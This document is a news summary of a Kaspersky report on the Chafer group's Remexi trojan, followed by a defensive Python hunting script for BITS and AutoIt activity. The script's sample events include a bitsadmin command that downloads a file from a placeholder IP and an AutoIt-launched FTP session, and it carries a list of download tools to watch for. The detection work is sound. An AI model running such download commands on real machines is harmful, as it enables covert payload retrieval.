Delaware, USA – February 1, 2019 – Kaspersky Lab’s security researchers have published a report on a campaign by the Chafer APT group against foreign diplomatic entities based in Iran. The campaign ran in the fall of 2018; the adversaries distributed an improved version of the Remexi trojan, built in the six months before the campaign began. The researchers were unable to establish how the malware initially got onto the systems, but in one infection an AutoIt script was used to download the trojan from the group’s FTP server. Remexi is a modular malware that the Chafer group has used since 2015. Its main functions include stealing user credentials and browser history, taking screenshots and executing commands. All communication with the command and control server, including data exfiltration, is carried out over the legitimate Microsoft Background Intelligent Transfer Service (BITS) mechanism.
The researchers note that the latest findings may indicate that the Chafer group’s activity began much earlier than 2015, the date previously assumed. This APT group is primarily engaged in domestic operations, occasionally running campaigns against Iran’s closest neighbors. The group had also previously been linked to operations carried out by another Iranian APT group, APT39, which collected victims’ personal data through attacks on telecommunications and travel companies. To detect sophisticated attacks of this kind on your infrastructure with the security tools you already have, you can use the Sysmon Framework and Threat Hunting Framework rule packs.
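The two behaviours the report describes (an AutoIt script fetching the payload over FTP, and BITS carrying C2 traffic and exfiltration) both leave traces in endpoint telemetry. The following is an added example, not code from Kaspersky Lab, the Chafer report or any rule pack: a small hunting routine that runs over Sysmon-style process-creation (event 1) and network-connection (event 3) records plus BITS-Client transfer-start (event 59) records. The field names, the allowlist of update hosts and the sample events are assumptions constructed for the example; real collectors will name fields differently, so map them before use.

```python
"""Hunt for Remexi-style tradecraft in endpoint telemetry (constructed example).

Rules:
  bits_transfer_to_unknown_host  - a BITS job starts pulling from a host that is
                                   not on the organisation's update allowlist
  bitsadmin_job_from_cmdline     - bitsadmin.exe used to create/drive a transfer
  autoit_spawns_network_tool     - the AutoIt interpreter launches a download tool
  autoit_ftp_connection          - the AutoIt interpreter talks to TCP/21 itself
"""
import re
from urllib.parse import urlparse

# Hosts this (hypothetical) organisation legitimately pulls BITS transfers from.
ALLOWED_BITS_HOSTS = {"download.windowsupdate.com", "update.example-corp.internal"}
# Binaries a script interpreter should not be spawning on a diplomat's workstation.
NETWORK_TOOLS = {"ftp.exe", "bitsadmin.exe", "certutil.exe", "powershell.exe", "curl.exe"}
BITSADMIN_JOB_SWITCHES = re.compile(r"/(transfer|create|addfile|resume|setnotifycmdline)\b", re.I)


def _basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_bits_unknown_host(ev):
    if ev.get("Source") != "BITS-Client" or ev.get("EventID") != 59:
        return None
    host = urlparse(ev.get("Url", "")).hostname
    if host not in ALLOWED_BITS_HOSTS:
        return "bits_transfer_to_unknown_host"
    return None


def rule_bitsadmin_cmdline(ev):
    if ev.get("Source") != "Sysmon" or ev.get("EventID") != 1:
        return None
    if _basename(ev.get("Image", "")) == "bitsadmin.exe" and BITSADMIN_JOB_SWITCHES.search(ev.get("CommandLine", "")):
        return "bitsadmin_job_from_cmdline"
    return None


def rule_autoit_child(ev):
    if ev.get("Source") != "Sysmon" or ev.get("EventID") != 1:
        return None
    if _basename(ev.get("ParentImage", "")) == "autoit3.exe" and _basename(ev.get("Image", "")) in NETWORK_TOOLS:
        return "autoit_spawns_network_tool"
    return None


def rule_autoit_ftp(ev):
    if ev.get("Source") != "Sysmon" or ev.get("EventID") != 3:
        return None
    if _basename(ev.get("Image", "")) == "autoit3.exe" and ev.get("DestinationPort") == 21:
        return "autoit_ftp_connection"
    return None


RULES = (rule_bits_unknown_host, rule_bitsadmin_cmdline, rule_autoit_child, rule_autoit_ftp)


def hunt(events):
    """Return (event_index, rule_name) for every record that trips a rule."""
    hits = []
    for idx, ev in enumerate(events):
        for rule in RULES:
            name = rule(ev)
            if name:
                hits.append((idx, name))
    return hits


# Constructed sample telemetry; 203.0.113.0/24 is a documentation range, not a real C2.
SAMPLE_EVENTS = [
    {"Source": "BITS-Client", "EventID": 59,
     "Url": "http://download.windowsupdate.com/d/msdownload/update/x.cab"},      # 0: benign
    {"Source": "BITS-Client", "EventID": 59, "Url": "http://203.0.113.7/u/p.dat"},  # 1: alert
    {"Source": "Sysmon", "EventID": 1, "Image": r"C:\Windows\System32\ftp.exe",
     "ParentImage": r"C:\Users\diplomat\AppData\Local\Temp\AutoIt3.exe",
     "CommandLine": "ftp -s:c.txt"},                                                # 2: alert
    {"Source": "Sysmon", "EventID": 3, "Image": r"C:\Users\diplomat\AppData\Local\Temp\AutoIt3.exe",
     "DestinationIp": "203.0.113.7", "DestinationPort": 21},                        # 3: alert
    {"Source": "Sysmon", "EventID": 1, "Image": r"C:\Windows\System32\bitsadmin.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "bitsadmin /transfer upd /download /priority foreground "
                    "http://203.0.113.7/u/p.dat C:\\Users\\Public\\p.dat"},          # 4: alert
    {"Source": "Sysmon", "EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},       # 5: benign
]

if __name__ == "__main__":
    for idx, name in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {name}")
```

The allowlist rule is the one that matters most here: BITS is used by Windows Update and plenty of enterprise software, so alerting on every BITS job is noise, while alerting on a job whose destination host nobody has vetted is exactly the signal a Remexi-style C2 channel produces. Tune `ALLOWED_BITS_HOSTS` from a baseline of your own BITS-Client logs before relying on it.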